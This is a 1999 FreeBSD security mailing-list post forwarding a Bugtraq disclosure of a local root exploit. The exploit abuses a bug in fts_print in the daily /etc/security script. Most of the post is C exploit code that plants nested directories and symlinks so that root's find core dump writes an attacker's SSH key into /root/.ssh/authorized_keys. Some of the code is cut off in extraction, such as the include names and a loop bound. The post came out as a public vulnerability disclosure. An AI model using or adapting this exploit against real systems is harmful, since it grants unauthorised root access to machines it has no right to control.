From owner-freebsd-security Thu Aug 26 9:47:20 1999 Delivered-To: freebsd-security@freebsd.org Received: from forrie.net (forrie.net [216.67.12.69]) by hub.freebsd.org (Postfix) with ESMTP id 5289C15ED5 for ; Thu, 26 Aug 1999 09:47:12 -0700 (PDT) (envelope-from forrie@forrie.com) Received: from boomer (boomer.navinet.net [216.67.12.90]) by forrie.net (8.9.3/8.9.3) with ESMTP id MAA08535 for ; Thu, 26 Aug 1999 12:47:03 -0400 (EDT) Message-Id: <4.2.0.58.19990826124527.00aa85b0@216.67.12.69> X-Sender: forrie@216.67.12.69 X-Mailer: QUALCOMM Windows Eudora Pro Version 4.2.0.58 Date: Thu, 26 Aug 1999 12:45:37 -0400 To: freebsd-security@freebsd.org From: Forrest Aldrich Subject: Fwd: FreeBSD (and other BSDs?) local root explot Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >Approved-By: aleph1@SECURITYFOCUS.COM >Delivered-To: bugtraq@securityfocus.com >X-Mailer: XFMail 1.3 [p0] on Linux >X-SMS: +48601383657@text.plusgsm.pl >X-PGP: PGP key on WWW or finger >X-Operating-System: FreeBSD 3.2-STABLE (i386) >Date: Tue, 24 Aug 1999 23:47:05 +0200 >Reply-To: Przemyslaw Frasunek >Sender: Bugtraq List >From: Przemyslaw Frasunek >Organization: Lubelska Grupa Uzytkownikow BSD >Subject: FreeBSD (and other BSDs?) local root explot >X-To: bugtraq@securityfocus.com >To: BUGTRAQ@SECURITYFOCUS.COM > >-----BEGIN PGP SIGNED MESSAGE----- >Hash: SHA1 > >/* > > (c) 1999 babcia padlina ltd. > > bug in fts_print function allows to overwrite any file in system, when > running /etc/security script (executed from 'daily' scripts). > > affected systems: > - freebsd (all versions) > - probably openbsd/netbsd > > fix: > - limit root's coredump size > - patch libc > >*/ > >#include >#include >#include >#include >#include > >#define STRING "\nYOUR PUBLIC SSH1 KEY (-b 512) GOES HERE!\n" >#define FILE "/root/.ssh/authorized_keys" >#define CORE "find.core" >#define DEPTH 300 >#define BUFSIZE 250 > >int makedir(dir, linkfrom, linkto) >char *dir, *linkfrom, *linkto; >{ > > if (mkdir(dir, (S_IRWXU | S_IRWXG | S_IRWXO))) > return -1; > > if (chdir(dir)) > return -1; > > if (symlink(linkfrom, linkto) < 0) > return -1; > > return 0; >} > > >int main(argc, argv) >int argc; >char **argv; >{ > int i = 0; > char pid[10], buf[BUFSIZE]; > > sprintf(pid, "%d", getpid()); > > if (mkdir(pid, (S_IRWXU | S_IRWXG | S_IRWXO))) > { > perror("mkdir()"); > return -1; > } > > if (chdir(pid)) > { > perror("chdir()"); > return -1; > } > > bzero(buf, BUFSIZE); > memset(buf, 0x41, BUFSIZE-1); > > for(i=0;i { > if (makedir(STRING, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > > if(makedir(buf, FILE, CORE) < 0) > { > perror("makedir()"); > return -1; > } > } > > return 0; >} > >- --- >* Fido: 2:480/124 ** WWW: FreeBSD.lublin.pl/~venglin ** GSM: +48-601-383657 * >* Inet: venglin@FreeBSD.lublin.pl ** PGP: D48684904685DF43 EA93AFA13BE170BF * > >-----BEGIN PGP SIGNATURE----- >Version: PGPfreeware 5.0i for non-commercial use >Charset: noconv > >iQA/AwUBN8MS2P6SPyHAYTvjEQLK5ACfZ1cVpjGzqIF3bTsIX/wrahJOqy4AoOEx >JkgnTo+Dk3QUFGT2bZdmxx9S >=Tyvh >-----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message